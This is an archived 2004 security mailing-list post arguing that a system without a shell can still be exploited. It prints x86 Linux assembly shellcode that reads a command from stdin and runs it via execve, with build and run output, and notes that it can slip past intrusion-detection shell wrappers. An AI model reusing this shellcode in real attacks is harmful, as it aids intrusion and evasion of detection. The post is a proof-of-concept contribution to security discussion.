[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20040709190146.18913.qmail@web52302.mail.yahoo.com>
From: mar_fallon at yahoo.com.br (Martin Fallon)
Subject: No shell => secure?
Hello Srs.!
We don't need a shell. One shellcode use system calls
and the shellcode can be the shell.
See the follow code:
-------------- noshell.s --------------
#Exemplo de assembly que simula shell.
#Sem utilizar nenhuma shell, ele ? a shell.:)
#Nash Leon - nashleon@...oo.com.br
#
#Obs: tah pegando apenas filename com 7 bytes.
_start:
#read(0,buffer,20)
xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80
#execve(buffer)
pushl %ecx
popl %esi
movl %esi,0x8(%esi)
movb $0x0,0x7(%esi)
movl $0x0,0xc(%esi)
movl $0xb,%eax
movl %esi,%ebx
leal 0x8(%esi),%ecx
#leal 0xc(%esi),%edx
movl $0x0, %edx
int $0x80
#exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------
This source use read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that is possible create
one shellcode that execute commands without
use one shell(/bin/bash,sh,zsh,tcsh, etc).
It is util when one NIDS/IPS interact with
one shell wrapper, waiting one string in the
interface, capturing an attack.
In this sample is permitted only
7 bytes as path filename to execute:
$ as -o noshell.o noshell.s
$ ld -o noshell noshell.s
ld: warning: cannot find entry symbol _start;
defaulting to
0000000008048074
$ /noshell
/bin/ls
noshell noshell.o noshell.s
So, Mrs. One shell is not necessary to exploit
one system. NIDs/IPS can use wrapper in the system
call execve() to security, but still is possible
break this resource.
Sorry ny poor english.
Best Regard,
Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/
_______________________________________________________
Yahoo! Mail agora com 100MB, anti-spam e antiv?rus gr?tis!
http://br.info.mail.yahoo.com/
Powered by blists - more mailing lists